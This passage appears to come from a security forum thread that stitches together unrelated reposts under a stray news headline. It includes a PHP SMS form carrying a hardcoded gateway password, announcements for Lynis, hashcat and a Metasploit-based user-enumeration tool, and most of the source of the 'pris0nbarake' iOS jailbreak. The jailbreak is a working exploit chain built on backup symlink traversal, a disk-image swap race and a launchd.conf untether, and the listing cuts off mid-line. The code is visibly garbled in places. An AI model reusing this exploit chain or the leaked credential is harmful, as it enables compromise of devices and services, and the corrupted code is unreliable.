Are Spreading Across the World | Entrepreneur.com
12. I don't know if it works, or whether it works in Romania:

<?php
if(!empty($_POST["message"])) {
    // Read the form fields
    $to      = $_POST["to"];
    $from    = $_POST["from"];
    $message = $_POST["message"];

    // Check whether a message has already been sent to this number
    $numbers = file_get_contents("numbers.txt");
    if(preg_match_all("/^.*$to.*\$/m", $numbers, $matches))
        die("A message has already been sent to this number.");

    // Send the SMS through the gateway
    $result = file_get_contents("http://api.fastsms.pro/send.php?username=Fmsg&password=b236d1aae3720b19d68255d23f42d096&useDirect=1&sender=$from&numbers=$to&message=".urlencode($message));
    if(is_numeric($result))
        echo("Message sent");
    else
        die("Sending error: $result.");

    // Append the number to the file so it will not be used again
    $file = fopen("numbers.txt", "a");
    fwrite($file, "$to\n");
    fclose($file);
    die();
}
?>
<form action='index.php' method='POST'>
<table>
<tr>
<td> Sender name:</td>
<td> <input name='from' type='text' value='DedMoroz' readonly></td>
</tr>
<tr>
<td> Recipient number:</td>
<td> <input name='to' type='text' value=''></td>
</tr>
<tr>
<td> Message text:</td>
<td> <input name='message' type='text' value='???? ???? ????' readonly></td>
</tr>
<tr>
<td> <button type='submit'>Send</button></td>
</tr>
</table>
</form>

Sursa: http://pastebin.com/raw.php?i=88UY7t2Z
  13. [h=1]30c3: To Protect And Infect, Part 2[/h] by: Jacob "@ioerror" Applebaum
14. Lynis, the Unix/Linux hardening tool, updated to v1.3.8

Lynis is a security tool to audit and harden Unix and Linux based systems. It scans the system by performing many security control checks, looks for installed software and determines compliance with standards. It will also detect security issues and errors in configuration. At the end of the scan it will provide warnings and suggestions to help you improve the security defenses of your systems.

Some of the (future) features and usage options:
System and security audit checks
File Integrity Assessment
System and file forensics
Usage of templates/baselines (reporting and monitoring)
Extended debugging features

This tool is tested or confirmed to work with: AIX, Linux, FreeBSD, OpenBSD, Mac OS X, Solaris

Changelog
New parameter --view-categories to display available test categories
Added /etc/hosts check (duplicates) [NAME-4402]
Added /etc/hosts check (hostname) [NAME-4404]
Added /etc/hosts check (localhost mapping) [NAME-4406]
Portmaster test for possible port upgrades [PKGS-7378]
Check for SPARC improved boot loader (SILO) [BOOT-5142]
NFS client access test [STRG-1930]
Check system uptime [BOOT-5202]
YUM repolist check [PKGS-7383]
Contributors file added
Improved locate database check and reporting [FILE-6410]
Improved PAE/No eXecute test for Linux kernel [KRNL-5677]
Disabled NIS domain name from test [NAME-4028]
Extended NIS domain test to check BSD sysctl value [NAME-4306]
Extended PAM tools check with PAM paths [AUTH-9262]
Adjusted Apache check to avoid skipping it [HTTP-6622]
Extended USB state testing [STRG-1840]
Extended Firewire state testing [STRG-1846]
Extended core dump test [KRNL-5820]
Added /lib/i386-linux-gnu/security to PAM directories
Added /usr/X11R6/bin directory to binary paths
Improved readability of screen output
Improved logging for several tests
Improved Debian version detection
Added warning to BIND test [NAME-4206]
Extended binaries with showmount and yum
Updated man page

Download

Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
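As a quick usage illustration (my own example, not part of the announcement, and option names can differ slightly between Lynis versions), a full audit from an unpacked release is typically run as:

cd lynis-1.3.8
sudo ./lynis --check-all -Q

The warnings and suggestions mentioned above are printed at the end of the run and are normally also written to the Lynis log and report files for later review.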
15. Kacak v0.1 released – Enumerate users in subnets

Kacak is a tool that can enumerate users specified in the configuration file for Windows based networks. It uses Metasploit's smb_enumusers_domain module to achieve this via the msfrpcd service. If you are wondering what the msfrpcd service is, please look at https://github.com/rapid7/metasploit-framework/blob/master/documentation/msfrpc.txt . It also parses mimikatz results.

Download

Submitted by Gokhan ALKAN (Tool's author)

Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
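For context (my own illustration rather than anything from the tool's documentation, and the exact switches may vary with your Metasploit version), msfrpcd is normally started with credentials that a client such as Kacak then uses to authenticate:

msfrpcd -U msf -P s3cr3t -a 127.0.0.1 -p 55553

The username, password, bind address and port shown here are placeholders; whatever you pick has to match what you configure on the Kacak side.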
  16. hashcat v0.47 (Advanced Password Recovery) Released Hashcat is the world’s fastest CPU-based password recovery tool. While it’s not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches. Changelog v0.47 added -m 123 = EPi added -m 1430 = sha256(unicode($pass).$salt) added -m 1440 = sha256($salt.unicode($pass)) added -m 1441 = EPiServer 6.x >= v4 added -m 1711 = SSHA-512(Base64), LDAP {SSHA512} added -m 1730 = sha512(unicode($pass).$salt) added -m 1740 = sha512($salt.unicode($pass)) added -m 7400 = SHA-256(Unix) added -m 7600 = Redmine SHA1 debug mode can now be used also together with -g, generate rule support added for using external salts together with mode 160 = HMAC-SHA1 (key = $salt) allow empty salt/key for HMAC algos allow variable rounds for hash modes 500, 1600, 1800, 3300, 7400 using rounds= specifier added –generate-rules-seed, sets seed used for randomization so rulesets can be reproduced added output-format type 8 (position:hash:plain) updated/added some hcchr charset files in /charsets, some new files: Bulgarian, Polish, Hungarian format output when using –show according to the –outfile-format option show mask length in status screen –disable-potfile in combination with –show or –left resulted in a crash, combination was disallowed Features Multi-Threaded Free Multi-Hash (up to 24 million hashes) Multi-OS (Linux, Windows and OSX native binaries) Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, …) SSE2, AVX and XOP accelerated All Attack-Modes except Brute-Force and Permutation can be extended by rules Very fast Rule-engine Rules compatible with JTR and PasswordsPro Possible to resume or limit session Automatically recognizes recovered hashes from outfile at startup Can automatically generate random rules Load saltlist from external file and then use them in a Brute-Force Attack variant Able to work in an distributed environment Specify multiple wordlists or multiple directories of wordlists Number of threads can be configured Threads run on lowest priority Supports hex-charset Supports hex-salt 90+ Algorithms implemented with performance in mind …and much more More Information: hashcat Wiki Download hashcat v0.47 Sursa: ToolsWatch.org – The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
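As a quick usage sketch (my own example, not part of the release notes; the CPU build ships as hashcat-cli32.bin/hashcat-cli64.bin and options may differ slightly between versions), a straight dictionary attack against one of the newly added modes would look roughly like:

./hashcat-cli64.bin -m 1711 -a 0 -o cracked.txt hashes.txt wordlist.txt

Here -m 1711 selects the new SSHA-512(Base64) mode from the changelog above, -a 0 is a straight dictionary attack, and -o writes recovered plains to cracked.txt.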
  17. * pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. /*** pris0nbarake - jailbreak.c * * Exploits from evasi0n and absinthe2. And others. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. **/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <dirent.h> #include <signal.h> #include <plist/plist.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/errno.h> #include <assert.h> #include <libimobiledevice/libimobiledevice.h> #include <libimobiledevice/lockdown.h> #include <libimobiledevice/mobile_image_mounter.h> #include <libimobiledevice/mobilebackup2.h> #include <libimobiledevice/notification_proxy.h> #include <libimobiledevice/afc.h> #include <libimobiledevice/sbservices.h> #include <libimobiledevice/file_relay.h> #include <libimobiledevice/diagnostics_relay.h> #include <zlib.h> #include <fcntl.h> #include <sys/mman.h> #include "partialcommon.h" #include "partial.h" #include "common.h" #include "MobileDevice.h" #define AFCTMP "HackStore" typedef struct _compatibility { char *product; char *build; } compatibility_t; compatibility_t compatible_devices[] = { {"N81AP", "10B400"}, {"N41AP", "10B350"}, {"N42AP", "10B350"}, {"N94AP", "10B329"}, {"N90BAP", "10B329"}, {"N90AP", "10B329"}, {"N92AP", "10B329"}, {"N81AP", "10B329"}, {"N88AP", "10B329"}, {"N78AP", "10B329"}, {"N41AP", "10B329"}, {"N42AP", "10B329"}, {"J1AP", "10B329"}, {"J2AP", "10B329"}, {"J2aAP", "10B329"}, {"P101AP", "10B329"}, {"P102AP", "10B329"}, {"P103AP", "10B329"}, {"K93AP", "10B329"}, {"K93AAP", "10B329"}, {"K94AP", "10B329"}, {"K95AP", "10B329"}, {"P105AP", "10B329"}, {"P106AP", "10B329"}, {"P107AP", "10B329"}, {NULL, NULL} }; static int cpio_get_file_name_length(void *cpio) { if (cpio) { char buffer[7]; int val; memset(buffer, '\0', 7); memcpy(&buffer, (void *) (cpio + 59), 6); /* File Name Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } static int cpio_get_file_length(void *cpio) { if (cpio) { char buffer[12]; int val; memset(buffer, '\0', 12); memcpy(&buffer, (void *) (cpio + 65), 11); /* File Length */ val = strtoul(buffer, NULL, 8); return val; } else { return 0; } } /* recursively remove path, including path */ static void rmdir_recursive(const char *path) { /*{{{ */ if (!path) { return; } DIR *cur_dir = opendir(path); if (cur_dir) { struct dirent *ep; while ((ep = readdir(cur_dir))) { if ((strcmp(ep->d_name, ".") == 0) || (strcmp(ep->d_name, "..") == 0)) { continue; } char *fpath = (char *) malloc(strlen(path) + 1 + strlen(ep->d_name) + 1); if (fpath) { struct stat st; strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, ep->d_name); if ((stat(fpath, &st) == 0) && S_ISDIR(st.st_mode)) { rmdir_recursive(fpath); } else { if (remove(fpath) != 0) { DEBUG("could not remove file %s: %s\n", fpath, strerror(errno)); } } free(fpath); } } closedir(cur_dir); } if (rmdir(path) != 0) { fprintf(stderr, "could not remove directory 
%s: %s\n", path, strerror(errno)); } } /*}}} */ static void print_xml(plist_t node) { char *xml = NULL; uint32_t len = 0; plist_to_xml(node, &xml, &len); if (xml) puts(xml); } /* char** freeing helper function */ static void free_dictionary(char **dictionary) { /*{{{ */ int i = 0; if (!dictionary) return; for (i = 0; dictionary; i++) { free(dictionary); } free(dictionary); } /*}}} */ /* recursively remove path via afc, (incl = 1 including path, incl = 0, NOT including path) */ static int rmdir_recursive_afc(afc_client_t afc, const char *path, int incl) { /*{{{ */ char **dirlist = NULL; if (afc_read_directory(afc, path, &dirlist) != AFC_E_SUCCESS) { //fprintf(stderr, "AFC: could not get directory list for %s\n", path); return -1; } if (dirlist == NULL) { if (incl) { afc_remove_path(afc, path); } return 0; } char **ptr; for (ptr = dirlist; *ptr; ptr++) { if ((strcmp(*ptr, ".") == 0) || (strcmp(*ptr, "..") == 0)) { continue; } char **info = NULL; char *fpath = (char *) malloc(strlen(path) + 1 + strlen(*ptr) + 1); strcpy(fpath, path); strcat(fpath, "/"); strcat(fpath, *ptr); if ((afc_get_file_info(afc, fpath, &info) != AFC_E_SUCCESS) || !info) { // failed. try to delete nevertheless. afc_remove_path(afc, fpath); free(fpath); free_dictionary(info); continue; } int is_dir = 0; int i; for (i = 0; info; i += 2) { if (!strcmp(info, "st_ifmt")) { if (!strcmp(info[i + 1], "S_IFDIR")) { is_dir = 1; } break; } } free_dictionary(info); if (is_dir) { rmdir_recursive_afc(afc, fpath, 0); } afc_remove_path(afc, fpath); free(fpath); } free_dictionary(dirlist); if (incl) { afc_remove_path(afc, path); } return 0; } /*}}} */ static int connected = 0; void jb_device_event_cb(const idevice_event_t * event, void *user_data) { char *uuid = (char *) user_data; DEBUG("device event %d: %s\n", event->event, event->udid); if (uuid && strcmp(uuid, event->udid)) return; if (event->event == IDEVICE_DEVICE_ADD) { connected = 1; } else if (event->event == IDEVICE_DEVICE_REMOVE) { connected = 0; } } static void idevice_event_cb(const idevice_event_t * event, void *user_data) { jb_device_event_cb(event, user_data); } typedef struct __csstores { uint32_t csstore_number; } csstores_t; static csstores_t csstores[16]; static int num_of_csstores = 0; int check_consistency(char *product, char *build) { // Seems legit. 
return 0; } int verify_product(char *product, char *build) { compatibility_t *curcompat = &compatible_devices[0]; while ((curcompat) && (curcompat->product != NULL)) { if (!strcmp(curcompat->product, product) && !strcmp(curcompat->build, build)) return 0; curcompat++; } return 1; } const char *lastmsg = NULL; static void status_cb(const char *msg, int progress) { if (!msg) { msg = lastmsg; } else { lastmsg = msg; } DEBUG("[%d%%] %s\n", progress, msg); } #ifndef __GUI__ int main(int argc, char *argv[]) { device_t *device = NULL; char *uuid = NULL; char *product = NULL; char *build = NULL; int old_os = 0; /********************************************************/ /* * device detection */ /********************************************************/ if (!uuid) { device = device_create(NULL); if (!device) { ERROR("No device found, is it plugged in?\n"); return -1; } uuid = strdup(device->uuid); } else { DEBUG("Detecting device...\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); return -1; } } DEBUG("Connected to device with UUID %s\n", uuid); lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { ERROR("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); lockdown_free(lockdown); device_free(device); return -1; } DEBUG("Device is a %s with build %s\n", product, build); if (verify_product(product, build) != 0) { ERROR("Device is not supported\n"); return -1; } plist_t pl = NULL; lockdown_get_value(lockdown, NULL, "ActivationState", &pl); if (pl && plist_get_node_type(pl) == PLIST_STRING) { char *as = NULL; plist_get_string_val(pl, &as); plist_free(pl); if (as) { if (strcmp(as, "Unactivated") == 0) { free(as); ERROR("The attached device is not activated. You need to activate it before it can be used with this jailbreak.\n"); lockdown_free(lockdown); device_free(device); return -1; } free(as); } } pl = NULL; lockdown_get_value(lockdown, "com.apple.mobile.backup", "WillEncrypt", &pl); if (pl && plist_get_node_type(pl) == PLIST_BOOLEAN) { char c = 0; plist_get_bool_val(pl, &c); plist_free(pl); if © { ERROR("You have a device backup password set. You need to disable the backup password in iTunes.\n"); lockdown_free(lockdown); device_free(device); return -1; } } lockdown_free(lockdown); device_free(device); device = NULL; idevice_event_subscribe(idevice_event_cb, uuid); jailbreak_device(uuid, status_cb); return 0; } #endif static void plist_replace_item(plist_t plist, char *name, plist_t item) { if (plist_dict_get_item(plist, name)) plist_dict_remove_item(plist, name); plist_dict_insert_item(plist, name, item); } kern_return_t send_message(service_conn_t socket, CFPropertyListRef plist); CFPropertyListRef receive_message(service_conn_t socket); static char *real_dmg, *real_dmg_signature, *ddi_dmg; static void print_data(CFDataRef data) { if (data == NULL) { DEBUG("[null]\n"); return; } DEBUG("[%.*s]\n", (int) CFDataGetLength(data), CFDataGetBytePtr(data)); } void qwrite(afc_connection * afc, const char *from, const char *to) { DEBUG("Sending %s -> %s... 
", from, to); afc_file_ref ref; int fd = open(from, O_RDONLY); assert(fd != -1); size_t size = (size_t) lseek(fd, 0, SEEK_END); void *buf = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 0); assert(buf != MAP_FAILED); AFCFileRefOpen(afc, to, 3, &ref); AFCFileRefWrite(afc, ref, buf, size); AFCFileRefClose(afc, ref); DEBUG("done.\n"); close(fd); } int timesl, tries = 0; volatile int is_ddid = 0; #undef assert #define assert(x) (x) /* badcode is bad */ static void cb2(am_device_notification_callback_info * info, void *foo) { timesl = 1000; struct am_device *dev; DEBUG("... %x\n", info->msg); if (is_ddid) CFRunLoopStop(CFRunLoopGetCurrent()); if (info->msg == ADNCI_MSG_CONNECTED) { dev = info->dev; tries++; if (tries >= 30) { is_ddid = -1; return; } AMDeviceConnect(dev); assert(AMDeviceIsPaired(dev)); assert(!AMDeviceValidatePairing(dev)); assert(!AMDeviceStartSession(dev)); CFStringRef product = AMDeviceCopyValue(dev, 0, CFSTR("ProductVersion")); assert(product); UniChar first = CFStringGetCharacterAtIndex(product, 0); int epoch = first - '0'; Retry: printf("."); fflush(stdout); service_conn_t afc_socket = 0; struct afc_connection *afc = NULL; assert(!AMDeviceStartService(dev, CFSTR("com.apple.afc"), &afc_socket, NULL)); assert(!AFCConnectionOpen(afc_socket, 0, &afc)); assert(!AFCDirectoryCreate(afc, "PublicStaging")); AFCRemovePath(afc, "PublicStaging/staging.dimage"); qwrite(afc, real_dmg, "PublicStaging/staging.dimage"); if (ddi_dmg) qwrite(afc, ddi_dmg, "PublicStaging/ddi.dimage"); service_conn_t mim_socket1 = 0; service_conn_t mim_socket2 = 0; assert(!AMDeviceStartService(dev, CFSTR("com.apple.mobile.mobile_image_mounter"), &mim_socket1, NULL)); assert(mim_socket1); CFPropertyListRef result = NULL; CFMutableDictionaryRef dict = CFDictionaryCreateMutable(NULL, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks); CFDictionarySetValue(dict, CFSTR("Command"), CFSTR("MountImage")); CFDictionarySetValue(dict, CFSTR("ImageType"), CFSTR("Developer")); CFDictionarySetValue(dict, CFSTR("ImagePath"), CFSTR("/var/mobile/Media/PublicStaging/staging.dimage")); int fd = open(real_dmg_signature, O_RDONLY); assert(fd != -1); uint8_t sig[128]; assert(read(fd, sig, sizeof(sig)) == sizeof(sig)); close(fd); CFDictionarySetValue(dict, CFSTR("ImageSignature"), CFDataCreateWithBytesNoCopy(NULL, sig, sizeof(sig), kCFAllocatorNull)); send_message(mim_socket1, dict); if (ddi_dmg) { DEBUG("sleep %d\n", timesl); usleep(timesl); assert(!AFCRenamePath(afc, "PublicStaging/ddi.dimage", "PublicStaging/staging.dimage")); } DEBUG("receive 1:\n"); result = receive_message(mim_socket1); print_data(CFPropertyListCreateXMLData(NULL, result)); if (strstr(CFDataGetBytePtr(CFPropertyListCreateXMLData(NULL, result)), "ImageMountFailed")) { timesl += 100; goto Retry; } is_ddid = 1; CFRunLoopStop(CFRunLoopGetCurrent()); fflush(stdout); } } void stroke_lockdownd(device_t * device) { plist_t crashy = plist_new_dict(); char *request = NULL; unsigned int size = 0; idevice_connection_t connection; uint32_t magic; uint32_t sent = 0; plist_dict_insert_item(crashy, "Request", plist_new_string("Pair")); plist_dict_insert_item(crashy, "PairRecord", plist_new_bool(0)); plist_to_xml(crashy, &request, &size); magic = __builtin_bswap32(size); plist_free(crashy); if (idevice_connect(device->client, 62078, &connection)) { ERROR("Failed to connect to lockdownd.\n"); } idevice_connection_send(connection, &magic, 4, &sent); idevice_connection_send(connection, request, size, &sent); idevice_connection_receive_timeout(connection, &size, 4, 
&sent, 1500); size = __builtin_bswap32(size); if (size) { void *ptr = malloc(size); idevice_connection_receive_timeout(connection, ptr, &size, &sent, 5000); } idevice_disconnect(connection); // XXX: Wait for lockdownd to start. sleep(5); } struct mobile_image_mounter_client_private { void *parent; void *mutex; }; char* overrides_plist = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" "<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n" "<plist version=\"1.0\">\n" "<dict>\n" " <key>com.apple.syslogd</key>\n" " <dict>\n" " <key>Disabled</key>\n" " <true/>\n" " </dict>\n" "</dict>\n" "</plist>\n"; void callback(ZipInfo* info, CDFile* file, size_t progress) { int percentDone = progress * 100/file->compressedSize; printf("Getting: %d%%\n", percentDone); } int jailbreak_device(const char *uuid, status_cb_t cb) { char backup_dir[1024]; device_t *device = NULL; char *build = NULL; char *product = NULL; struct lockdownd_service_descriptor desc = { 0, 0 }; int is_jailbroken = 0; if (!uuid) { ERROR("Missing device UDID\n"); return -1; } assert(cb); tmpnam(backup_dir); DEBUG("Backing up files to %s\n", backup_dir); // Wait for a connection DEBUG("Connecting to device...\n"); cb("Connecting to device...\n", 2); int retries = 20; int i = 0; while (!connected && (i++ < retries)) { sleep(1); } if (!connected) { ERROR("Device connection failed\n"); return -1; } // Open a connection to our device DEBUG("Opening connection to device\n"); device = device_create(uuid); if (device == NULL) { ERROR("Unable to connect to device\n"); } lockdown_t *lockdown = lockdown_open(device); if (lockdown == NULL) { WARN("Lockdown connection failed\n"); device_free(device); return -1; } if ((lockdown_get_string(lockdown, "HardwareModel", &product) != LOCKDOWN_E_SUCCESS) || (lockdown_get_string(lockdown, "BuildVersion", &build) != LOCKDOWN_E_SUCCESS)) { ERROR("Could not get device information\n"); if (product) { free(product); } if (build) { free(build); } lockdown_free(lockdown); device_free(device); return -1; } cb("Getting payload files from Apple... (if this fails, your internet connection has issues...)\n", 5); struct stat st; /* Hackcheck for network connection... */ ZipInfo* info2 = PartialZipInit("http://appldnld.apple.com/iOS6.1/091-2397.20130319.EEae9/iPad2,1_6.1.3_10B329_Restore.ipsw"); if(!info2) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info2, callback); CDFile* file = PartialZipFindFile(info2, "BuildManifest.plist"); if(!file) { ERROR("cannot file find\n"); return -1; } PartialZipRelease(info2); DEBUG("Device info: %s, %s\n", product, build); DEBUG("Beginning jailbreak, this may take a while...\n"); cb("Gathering information to generate jailbreak data...\n", 10); uint16_t port = 0; is_ddid = 0; if (lockdown_start_service(lockdown, "com.apple.afc2", &port) == 0) { char **fileinfo = NULL; uint32_t ffmt = 0; afc_client_t afc2 = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc2); if (afc2) { afc_get_file_info(afc2, "/Applications", &fileinfo); if (fileinfo) { int i; for (i = 0; fileinfo; i += 2) { if (!strcmp(fileinfo, "st_ifmt")) { if (strcmp(fileinfo[i + 1], "S_IFLNK") == 0) { ffmt = 1; } break; } } afc_free_dictionary(fileinfo); fileinfo = NULL; if (ffmt) { ERROR("Device already jailbroken! 
Detected stash."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected stash.", 100); return 0; } } afc_get_file_info(afc2, "/private/etc/launchd.conf", &fileinfo); if (fileinfo) { ERROR("Device already jailbroken! Detected untether."); afc_client_free(afc2); lockdown_free(lockdown); device_free(device); cb("Device already jailbroken, detected untether.", 100); return 0; } afc_client_free(afc2); } } if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { ERROR("Failed to start AFC service", 0); lockdown_free(lockdown); device_free(device); return -1; } lockdown_free(lockdown); lockdown = NULL; afc_client_t afc = NULL; desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { ERROR("Could not connect to AFC service\n"); device_free(device); return -1; } // check if directory exists char **list = NULL; if (afc_read_directory(afc, "/" AFCTMP, &list) != AFC_E_SUCCESS) { // we're good, directory does not exist. } else { free_dictionary(list); WARN("Looks like you attempted to apply this Jailbreak and it failed. Will try to fix now...\n", 0); sleep(5); goto fix; } afc_client_free(afc); afc = NULL; /** SYMLINK: Recordings/.haxx -> /var */ rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); char *bargv[] = { "idevicebackup2", "backup", backup_dir, NULL }; char *rargv[] = { "idevicebackup2", "restore", "--system", "--settings", "--reboot", backup_dir, NULL }; char *rargv2[] = { "idevicebackup2", "restore", "--system", "--settings", backup_dir, NULL }; backup_t *backup; rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); idevicebackup2(3, bargv); cb("Sending initial data...\n", 15); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* Reboot for the sake of posterity. Gets rid of all Developer images mounted. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/var/db/launchd.db/com.apple.launchd", 501, 501, 4) != 0) { ERROR("Failed to symlink var!\n"); return -1; } FILE *f = fopen("payload/common/overrides.plist", "wb+"); fwrite(overrides_plist, sizeof(overrides_plist), 1, f); fclose(f); if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/overrides.plist", "Media/Recordings/.haxx/overrides.plist", 0100755, 0, 0, 4) != 0) { ERROR("Could not add tar"); return -1; } } idevicebackup2(6, rargv); unlink("payload/common/overrides.plist"); backup_free(backup); cb("Waiting for reboot. Do not unplug your device.\n", 18); /********************************************************/ /* wait for device reboot */ /********************************************************/ // wait for disconnect while (connected) { sleep(2); } DEBUG("Device %s disconnected\n", uuid); // wait for device to connect while (!connected) { sleep(2); } DEBUG("Device %s detected. Connecting...\n", uuid); sleep(10); /********************************************************/ /* wait for device to finish booting to springboard */ /********************************************************/ device = device_create(uuid); if (!device) { ERROR("ERROR: Could not connect to device. Aborting."); // we can't recover since the device connection failed... return -1; } lockdown = lockdown_open(device); if (!lockdown) { device_free(device); ERROR("ERROR: Could not connect to lockdown. 
Aborting"); // we can't recover since the device connection failed... return -1; } retries = 100; int done = 0; sbservices_client_t sbsc = NULL; plist_t state = NULL; DEBUG("Waiting for SpringBoard...\n"); while (!done && (retries-- > 0)) { port = 0; lockdown_start_service(lockdown, "com.apple.springboardservices", &port); if (!port) { continue; } sbsc = NULL; desc.port = port; sbservices_client_new(device->client, &desc, &sbsc); if (!sbsc) { continue; } if (sbservices_get_icon_state(sbsc, &state, "2") == SBSERVICES_E_SUCCESS) { plist_free(state); state = NULL; done = 1; } sbservices_client_free(sbsc); if (done) { sleep(3); DEBUG("bootup complete\n"); break; } sleep(3); } lockdown_free(lockdown); lockdown = NULL; /* Download images. */ if(stat("payload/iOSUpdaterHelper.dmg", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg"); if(!file) { ERROR("Cannot find file in zip 1\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } if(stat("payload/iOSUpdaterHelper.dmg.signature", &st)) { ZipInfo* info = PartialZipInit("http://appldnld.apple.com/iOS6/041-8518.20121029.CCrt9/iOSUpdater.ipa"); if(!info) { ERROR("Cannot make PartialZip context\n"); return -1; } PartialZipSetProgressCallback(info, callback); CDFile* file = PartialZipFindFile(info, "Payload/iOSUpdater.app/iOSUpdaterHelper.dmg.signature"); if(!file) { ERROR("Cannot find file in zip 2\n"); return -1; } unsigned char* data = PartialZipGetFile(info, file); int dataLen = file->size; PartialZipRelease(info); data = realloc(data, dataLen + 1); data[dataLen] = '\0'; FILE* out; out = fopen("payload/iOSUpdaterHelper.dmg.signature", "wb+"); if (out == NULL) { ERROR("Failed to open file"); return -1; } fwrite(data, sizeof(char), dataLen, out); fclose(out); free(data); } /* * Upload DDI original. */ real_dmg = "payload/iOSUpdaterHelper.dmg"; real_dmg_signature = "payload/iOSUpdaterHelper.dmg.signature"; ddi_dmg = "payload/hax.dmg"; cb("Waiting for device...\n", 25); //dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{ AMDAddLogFileDescriptor(2); am_device_notification * notif; assert(!AMDeviceNotificationSubscribe(cb2, 0, 0, NULL, &notif)); CFRunLoopRun(); //}); while (!is_ddid) ; if (is_ddid == -1) { ERROR("Failed to mount image\n"); cb("Failed to mount image\n", 10); return -1; } /** DDI Mounted! */ if (!lockdown) lockdown = lockdown_open(device); cb("Remounting root...\n", 40); if (lockdown_start_service(lockdown, "r", &port) != 0) { DEBUG("Timed out on doing so... doesn't really matter though..\n"); } /* Delete files */ unlink("payload/iOSUpdaterHelper.dmg"); unlink("payload/iOSUpdaterHelper.dmg.signature"); /** Install bootstrap. */ rmdir_recursive_afc(afc, "/Recordings", 1); if (lockdown_start_service(lockdown, "com.apple.afc2", &port) != 0) { ERROR("Device failed to mount image proper!\n"); return -1; } /* * Goody, goody. Let's copy everything over! 
*/ cb("Sending Cydia and untether payload to the device...\n", 70); rmdir_recursive(backup_dir); mkdir(backup_dir, 0755); if (!afc) { lockdown = lockdown_open(device); port = 0; if (lockdown_start_service(lockdown, "com.apple.afc", &port) != 0) { WARN("Could not start AFC service. Aborting.\n"); lockdown_free(lockdown); goto leave; } lockdown_free(lockdown); desc.port = port; afc_client_new(device->client, &desc, &afc); if (!afc) { WARN("Could not connect to AFC. Aborting.\n"); goto leave; } } rmdir_recursive_afc(afc, "/Recordings", 1); idevicebackup2(3, bargv); backup = backup_open(backup_dir, uuid); if (!backup) { fprintf(stderr, "ERROR: failed to open backup\n"); return -1; } /* * Do it again. */ { if (backup_mkdir(backup, "MediaDomain", "Media/Recordings", 0755, 501, 501, 4) != 0) { ERROR("Could not make folder\n"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx", "/", 501, 501, 4) != 0) { ERROR("Failed to symlink root!\n"); return -1; } if (backup_mkdir(backup, "MediaDomain", "Media/Recordings/.haxx/var/untether", 0755, 0, 0, 4) != 0) { ERROR("Could not make folder\n"); return -1; } { char jb_path[128]; char amfi_path[128]; char launchd_conf_path[128]; snprintf(jb_path, 128, "payload/common/untether", build, product); snprintf(amfi_path, 128, "payload/common/_.dylib", build, product); snprintf(launchd_conf_path, 128, "payload/common/launchd.conf", build, product); if (backup_add_file_from_path(backup, "MediaDomain", launchd_conf_path, "Media/Recordings/.haxx/var/untether/launchd.conf", 0100644, 0, 0, 4) != 0) { ERROR("Could not add launchd.conf"); return -1; } if (backup_symlink(backup, "MediaDomain", "Media/Recordings/.haxx/private/etc/launchd.conf", "/private/var/untether/launchd.conf", 0, 0, 4) != 0) { ERROR("Failed to symlink launchd.conf!\n"); return -1; } if (backup_add_file_from_path(backup, "MediaDomain", "payload/common/tar", "Media/Recordings/.haxx/var/untether/tar", 0100755, 0, 0, 